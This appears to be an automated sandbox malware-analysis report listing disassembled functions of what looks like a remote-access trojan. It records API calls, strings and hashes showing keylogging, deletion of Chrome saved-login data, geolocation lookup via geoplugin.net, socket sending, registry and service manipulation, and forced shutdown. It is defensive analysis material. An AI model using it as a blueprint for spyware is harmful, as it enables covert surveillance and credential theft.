                                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Find$CreateFirstNext
                                                                                        • String ID: 8SG$PXG$PXG$NG$PG
                                                                                        • API String ID: 341183262-3812160132
                                                                                        • Opcode ID: bef3662a98f203fd8959110ad3b8c393325e7dbc5807a61bff8cf10b28a3f201
                                                                                        • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                                                                        • Opcode Fuzzy Hash: bef3662a98f203fd8959110ad3b8c393325e7dbc5807a61bff8cf10b28a3f201
                                                                                        • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32 ref: 0040A416
                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                                        • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                                                        • GetKeyState.USER32(00000010), ref: 0040A433
                                                                                        • GetKeyboardState.USER32(?), ref: 0040A43E
                                                                                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                                                                        • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                                                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 1888522110-0
                                                                                        • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                                                                        • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                                                                        • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                                                                        • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                        • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                        • API String ID: 2127411465-314212984
                                                                                        • Opcode ID: 5c1ab5f3fb1cf2b2c54c0a1d939c6765263ff7c3c04796efd8fccf04486207c6
                                                                                        • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                                                                        • Opcode Fuzzy Hash: 5c1ab5f3fb1cf2b2c54c0a1d939c6765263ff7c3c04796efd8fccf04486207c6
                                                                                        • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00449212
                                                                                        • _free.LIBCMT ref: 00449236
                                                                                        • _free.LIBCMT ref: 004493BD
                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                                        • _free.LIBCMT ref: 00449589
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                        • String ID:
                                                                                        • API String ID: 314583886-0
                                                                                        • Opcode ID: 0007e75861983f1ba196b38ac0ac2f4397b59b74266b2e2cb4182d4733177f97
                                                                                        • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                                                                        • Opcode Fuzzy Hash: 0007e75861983f1ba196b38ac0ac2f4397b59b74266b2e2cb4182d4733177f97
                                                                                        • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                                          • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                                          • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                                          • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                                          • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                                                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                                                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                        • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                        • API String ID: 1589313981-2876530381
                                                                                        • Opcode ID: 06b2ed81386eea833f57913314ae7cc45cedb7ecee8fca0ea64c9477fec69274
                                                                                        • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                                                                        • Opcode Fuzzy Hash: 06b2ed81386eea833f57913314ae7cc45cedb7ecee8fca0ea64c9477fec69274
                                                                                        • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                                                                        • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                                                                        • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID: ACP$OCP$['E
                                                                                        • API String ID: 2299586839-2532616801
                                                                                        • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                                        • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                                                        • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                                        • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                                                        Strings
                                                                                        • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                                                        • String ID: http://geoplugin.net/json.gp
                                                                                        • API String ID: 3121278467-91888290
                                                                                        • Opcode ID: 4da1b85d2ea56bad142503f0f1c0f54d6a8de9b2ae8113808786c7ddc0b742be
                                                                                        • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                                                        • Opcode Fuzzy Hash: 4da1b85d2ea56bad142503f0f1c0f54d6a8de9b2ae8113808786c7ddc0b742be
                                                                                        • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                                                                        • GetLastError.KERNEL32 ref: 0040BA58
                                                                                        Strings
                                                                                        • UserProfile, xrefs: 0040BA1E
                                                                                        • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                                                                        • [Chrome StoredLogins not found], xrefs: 0040BA72
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DeleteErrorFileLast
                                                                                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                        • API String ID: 2018770650-1062637481
                                                                                        • Opcode ID: 7df5978969732fb09709de34775d6ce1a623c26fc4145e618767f27fcf07f662
                                                                                        • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                                                                        • Opcode Fuzzy Hash: 7df5978969732fb09709de34775d6ce1a623c26fc4145e618767f27fcf07f662
                                                                                        • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                                        • GetLastError.KERNEL32 ref: 0041799D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                        • String ID: SeShutdownPrivilege
                                                                                        • API String ID: 3534403312-3733053543
                                                                                        • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                                        • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                                                        • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                                        • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00409258
                                                                                          • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                                                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                                                        • FindClose.KERNEL32(00000000), ref: 004093C1
                                                                                          • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,00000000,00000000,?,00474EF8,?), ref: 00404E38
                                                                                          • Part of subcall function 00404E26: SetEvent.KERNEL32(00000000), ref: 00404E43
                                                                                          • Part of subcall function 00404E26: CloseHandle.KERNEL32(00000000), ref: 00404E4C
                                                                                        • FindClose.KERNEL32(00000000), ref: 004095B9
                                                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                        • String ID:
                                                                                        • API String ID: 1824512719-0
                                                                                        • Opcode ID: f9045dcdb2f3133ff8fba91c5ff4e6bf62ac57e12963de0168c3bd7490a17388
                                                                                        • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                                                        • Opcode Fuzzy Hash: f9045dcdb2f3133ff8fba91c5ff4e6bf62ac57e12963de0168c3bd7490a17388
                                                                                        • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                        • String ID:
                                                                                        • API String ID: 276877138-0
                                                                                        • Opcode ID: 3fc825cdaf5b3c830df2a570b4d58928aafbb4be2e2bcb8024994744d056a879
                                                                                        • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                                                        • Opcode Fuzzy Hash: 3fc825cdaf5b3c830df2a570b4d58928aafbb4be2e2bcb8024994744d056a879
                                                                                        • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00451CD8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                                                                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                                                                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                                                                        • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                                                                        • _wcschr.LIBVCRUNTIME ref: 00451E58
                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                        • String ID: sJD
                                                                                        • API String ID: 4212172061-3536923933
                                                                                        • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                                                        • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                                                                        • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                                                        • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00413549: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                                                                          • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                                                                          • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                                                                        • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                                                                        • ExitProcess.KERNEL32 ref: 0040F8CA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                        • String ID: 4.9.4 Pro$override$pth_unenc
                                                                                        • API String ID: 2281282204-930821335
                                                                                        • Opcode ID: 58c5b883e5d172f22ef58a46adbd46fba81c8570fd30b9f4b5b12bcade53b407
                                                                                        • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                                                        • Opcode Fuzzy Hash: 58c5b883e5d172f22ef58a46adbd46fba81c8570fd30b9f4b5b12bcade53b407
                                                                                        • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                                                                        • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                                                        • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                                                        • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                        • String ID: SETTINGS
                                                                                        • API String ID: 3473537107-594951305
                                                                                        • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                                        • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                                                        • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                                        • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 0040966A
                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                                                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstH_prologNext
                                                                                        • String ID:
                                                                                        • API String ID: 1157919129-0
